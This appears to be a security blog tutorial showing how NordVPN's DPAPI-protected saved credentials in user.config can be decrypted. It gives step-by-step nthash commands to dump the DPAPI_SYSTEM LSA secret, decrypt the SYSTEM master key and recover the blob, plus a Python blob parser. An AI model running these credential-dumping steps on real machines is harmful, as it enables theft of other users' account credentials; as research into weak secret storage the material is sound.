We now know that DPAPI secrets are everywhere, stored in various ways.
Let's have a look at a popular VPN client: NordVPN.
NordVPN stores its secrets (username/password) in an XML config file and protects them with DPAPI in machine scope (not good if you ask me: a machine-scope blob can be decrypted by any account on that machine, not only the one that saved it).
Let's see how to decrypt it.
1-Retrieve NordVPN's user.config from c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\
2-Retrieve the base64 values stored for the username and password
Example of such a base64 value below (it is a plain DPAPI blob: it starts with the DPAPI provider GUID and carries the GUID of the master key that protects it)
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=
3-Decode it to a hex string
echo base64string| nthash-win64 /base64decodehexa
4-Save the hex string to a file
echo hexastring| nthash-win64 /hexatofile
or … steps 3 and 4 can be done in one go (pipe in… pipe out…) like below
echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile
5-Retrieve the master key GUID from the blob
nthash-win64 /decodeblob
6-Retrieve the DPAPI_SYSTEM key (the LSA secret that holds the machine key and the user key)
nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(the master key files under Protect\S-1-5-18 are normally encrypted with the machine key; if the machine key does not work, try the user key)
7-Decrypt the (encrypted) master key file named by that GUID
echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52
8-Finally, decrypt the DPAPI blob with the SHA-1 of the decrypted master key
echo mymksha1key| nthash-win64 /decodeblob
or … steps 6, 7 and 8 can be done in one go like below
NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob
Note that, online, any user logged on to that machine can simply do the below, since a machine-scope blob does not depend on the calling user's credentials
echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata
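As an added example (my own code, not part of this post's original material and not part of nthash), here is a small Python parser for the DPAPI blob format that does offline what step 5 (/decodeblob) does: it reads the blob quoted above, pulls out the master key GUID, and checks the flags word, which in this blob carries CRYPTPROTECT_LOCAL_MACHINE (0x4) and so confirms the machine scope claimed earlier. It also builds the master key file path used in step 7. It assumes the standard Windows locations for master key files (the user-scope profile path is a placeholder) and decrypts nothing; it only parses the structure.

```python
import base64
import struct
import uuid

# The DPAPI blob quoted earlier in this post (a NordVPN user.config value),
# reflowed onto one line. Everything else in this file is added example code.
PAGE_BLOB_B64 = (
    "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA"
    "AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx"
    "xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/"
    "NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto="
)

# Constants from the DPAPI blob layout and wincrypt.h
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # dwFlags bit set by machine-scope CryptProtectData
ALG_NAMES = {0x6603: "CALG_3DES", 0x660e: "CALG_AES_128", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800e: "CALG_SHA_512"}
SYSTEM_PROTECT_DIR = r"C:\Windows\System32\Microsoft\Protect\S-1-5-18"


def parse_dpapi_blob(blob: bytes) -> dict:
    """Parse a CryptProtectData blob: fixed header, then DWORD-length-prefixed
    byte strings. Raises ValueError on anything malformed or truncated."""
    pos = 0

    def u32() -> int:
        nonlocal pos
        if pos + 4 > len(blob):
            raise ValueError("truncated blob at offset %d" % pos)
        (value,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def take(n: int) -> bytes:
        nonlocal pos
        if pos + n > len(blob):
            raise ValueError("truncated blob at offset %d" % pos)
        chunk = blob[pos:pos + n]
        pos += n
        return chunk

    def lv() -> bytes:  # DWORD length followed by that many bytes
        return take(u32())

    version = u32()
    provider = uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    info = {
        "masterkey_version": u32(),
        "masterkey_guid": uuid.UUID(bytes_le=take(16)),  # names the master key file to fetch
        "flags": u32(),
        "description": lv().decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": u32(), "alg_crypt_len": u32(),
        "salt": lv(),
        "hmac_key": lv(),    # empty on current blobs
        "alg_hash": u32(), "alg_hash_len": u32(),
        "hmac2_key": lv(),
        "data": lv(),        # the ciphertext
        "sign": lv(),        # HMAC over the blob, alg_hash_len/8 bytes long
    }
    if pos != len(blob):
        raise ValueError("%d trailing bytes after blob" % (len(blob) - pos))
    if len(info["sign"]) != info["alg_hash_len"] // 8:
        raise ValueError("signature length does not match the hash algorithm")
    return info


def parse_dpapi_blob_b64(b64: str) -> dict:
    return parse_dpapi_blob(base64.b64decode(b64))


def is_machine_scope(info: dict) -> bool:
    return bool(info["flags"] & CRYPTPROTECT_LOCAL_MACHINE)


def masterkey_path(info: dict, user_sid: str = None,
                   profile: str = r"C:\Users\username") -> str:
    """Where the master key file named in the blob lives: machine-scope blobs
    use the SYSTEM master keys, user-scope blobs the owner's roaming profile
    (profile path is a placeholder assumption, not taken from the post)."""
    guid = str(info["masterkey_guid"])
    if is_machine_scope(info):
        return SYSTEM_PROTECT_DIR + "\\" + guid
    if user_sid is None:
        raise ValueError("user-scope blob: the owning user's SID is needed")
    return profile + r"\AppData\Roaming\Microsoft\Protect" + "\\" + user_sid + "\\" + guid


def summarize(info: dict) -> str:
    scope = "machine (CRYPTPROTECT_LOCAL_MACHINE)" if is_machine_scope(info) else "user"
    return "\n".join([
        "master key GUID : %s" % info["masterkey_guid"],
        "scope           : %s" % scope,
        "cipher          : %s (%d-bit)" % (ALG_NAMES.get(info["alg_crypt"], hex(info["alg_crypt"])), info["alg_crypt_len"]),
        "hash            : %s (%d-bit)" % (ALG_NAMES.get(info["alg_hash"], hex(info["alg_hash"])), info["alg_hash_len"]),
        "ciphertext      : %d bytes" % len(info["data"]),
        "master key file : %s" % masterkey_path(info),
    ])


if __name__ == "__main__":
    print(summarize(parse_dpapi_blob_b64(PAGE_BLOB_B64)))
```

Run as-is it prints the summary for the blob from this post; paste in any other user.config value to see which master key file and which scope you are dealing with before going after DPAPI_SYSTEM. The parser refuses anything that is not a version-1 blob with the DPAPI provider GUID, and rejects truncated or padded input, which is useful when a value was copied out of the XML incorrectly.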